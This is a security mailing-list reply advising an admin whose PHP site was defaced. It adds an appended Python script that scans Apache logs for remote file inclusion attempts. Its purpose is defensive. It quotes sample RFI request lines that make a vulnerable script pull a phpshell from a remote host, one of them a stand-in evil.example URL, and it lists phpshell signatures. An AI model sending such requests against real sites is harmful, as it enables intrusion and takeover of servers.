Re: Hacked by aLpTurkTegin, help patching this hole



What was the user ownership of the hacked files: the user account or the webserver?

In my experience, if it was the user account, then there was a weak
password and it was brute-forced. Check the FTP logs for file uploads
for that user account.

If it was owned by the webserver, then there is probably
exploitable PHP code on the site, and usually it is due to a remote
file inclusion (RFI).
Check the Apache domlogs; you might get lucky and find something.
RFI entries often look something like:

69.89.25.169 - - [25/Jan/2008:10:23:23 -0500] "GET //includes/img/settings.inc.php?include_path=http://example.remoteserver.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 200 - "-"

In the above example, the PHP file "settings.inc.php" is vulnerable
and allows the code in a PHP file on a remote server
(example.remoteserver.com) to be included (cmd.txt). Many times the
remote file will be a phpshell.

Of course, this is just an example; you'd have to find what is being
exploited using what the others have suggested...

Sorry, this is kinda long-winded and pretty much what everyone else
said, but I have to deal with annoying defacement of sites every day.
People that do that really bug me, plus I'm bored right now. :)

One HUGE help would be to make sure you have mod_security installed
and a decent modsec ruleset. That will prevent a lot of naughtiness
from happening.

I also like to check for perl procs running as the webserver ID,
world-writable directories, and phpshells located in user accounts.

find /home/useraccountname/public_html/ -type d -perm 777

will locate insecure directories.

The following one-liner will find many common phpshells:

find /home/*/public_html -type f -print0 | xargs -0 egrep '(\/tmp\/cmdtemp|SnIpEr_SA|c99shell|r57shell|milw0rm)'

It may take quite a while to complete depending on how many files
there are on the server.

My money is on an outdated PHP CMS/forum like phpBB, etc., like
everyone else mentioned...

On Tue, May 20, 2008 at 8:46 AM, Mifa <mifa@xxxxxxxxxxxxxxx> wrote:

Our website was defaced by aLpTurkTegin. We are running Apache, PHP, etc. Does anyone know how this hacker is getting in and what I can do to prevent this?

Our main web directory had all but one file deleted, and hackedIndex.php, a.asp (a 0-byte file) and trustscn_put_test2 were placed into the main directory. The fact that the webserver served hackedIndex.php makes me think it's an Apache web server flaw.

Any comments, suggestions?
Thanks, -D
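As an added example (not code from either poster in this thread), the following Python script does the log triage the reply describes: it parses Apache access-log lines, flags requests whose query-string parameters carry a remote URL (the RFI pattern in the quoted log entry), records whether the server answered 200, and groups the attempts by source IP and target script. It also applies the same signature list as the find | egrep one-liner to file contents. The log lines are constructed for the example (the first one is the entry quoted in the reply); the hostname evil.example and the script /lib/config.php are made up. Two details matter in practice: the query string is split by hand because the quoted request starts with "//", which urlsplit() would misread as a network location, and parse_qsl() percent-decodes values, so an encoded "http%3A%2F%2F..." payload is caught as well. A 200 response does not prove the remote include executed, but it is the entry to check first.

```python
import re
from urllib.parse import parse_qsl

# Prefix of an Apache common/combined access-log line:
#   host ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3})'
)

# A query-string value starting with one of these asks include()/require()
# to pull code from somewhere other than the local docroot.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://", "php://", "data:")

# Same signature list as the find | egrep one-liner in the reply above.
SHELL_SIG_RE = re.compile(r'(/tmp/cmdtemp|SnIpEr_SA|c99shell|r57shell|milw0rm)')

# Constructed sample log (assumption: not a real log). Line 1 is the entry
# quoted in the reply; evil.example and /lib/config.php are made up.
SAMPLE_LOG = [
    '69.89.25.169 - - [25/Jan/2008:10:23:23 -0500] "GET //includes/img/settings.inc.php'
    '?include_path=http://example.remoteserver.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 200 - "-"',
    '10.0.0.5 - - [25/Jan/2008:10:24:01 -0500] "GET /index.php?page=about HTTP/1.1" 200 5120 "-"',
    '69.89.25.169 - - [25/Jan/2008:10:25:10 -0500] "GET /lib/config.php'
    '?dir=ftp%3A%2F%2Fevil.example%2Fr57.txt%3F HTTP/1.1" 404 - "-"',
    '10.0.0.9 - - [25/Jan/2008:10:26:44 -0500] "POST /login.php HTTP/1.1" 302 - "-"',
]


def rfi_hit(line):
    """Return details of the RFI attempt in one access-log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Split on the first '?' by hand: urlsplit() would treat the leading
    # '//' of the quoted request as a network location, not a path.
    script, _, query = m.group("target").partition("?")
    # parse_qsl percent-decodes, so an encoded "http%3A%2F%2F..." is caught too.
    remote = [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
              if v.lstrip().lower().startswith(REMOTE_SCHEMES)]
    if not remote:
        return None
    return {"host": m.group("host"), "time": m.group("time"), "script": script,
            "status": int(m.group("status")), "includes": remote}


def scan_log(lines):
    """All RFI attempts in an iterable of access-log lines, in order."""
    return [h for h in (rfi_hit(line) for line in lines) if h]


def summarize(hits):
    """Group attempts by (source IP, target script). 'succeeded' means the
    server answered 200 for at least one attempt; check those scripts first."""
    out = {}
    for h in hits:
        entry = out.setdefault((h["host"], h["script"]),
                               {"attempts": 0, "succeeded": False, "urls": set()})
        entry["attempts"] += 1
        entry["succeeded"] = entry["succeeded"] or h["status"] == 200
        entry["urls"].update(v for _, v in h["includes"])
    return out


def looks_like_phpshell(content):
    """True if file content matches one of the shell signatures above."""
    return SHELL_SIG_RE.search(content) is not None


if __name__ == "__main__":
    for (host, script), e in summarize(scan_log(SAMPLE_LOG)).items():
        print(f"{host} -> {script}: {e['attempts']} attempt(s), "
              f"{'SUCCEEDED' if e['succeeded'] else 'failed'}, urls={sorted(e['urls'])}")
```

Feed it a real domlog by reading the file line by line into scan_log(); the summary tells you which scripts to look at and which remote URLs were pulled, which is what you need to fetch and inspect (from a safe machine) to see whether it was a phpshell.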

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Top 5 Common Mistakes
in Securing Web Applications
Find out now! Get Webinar Recording and PPT Slides

www.cenzic.com/landing/securityfocus/hackinar
------------------------------------------------------------------------


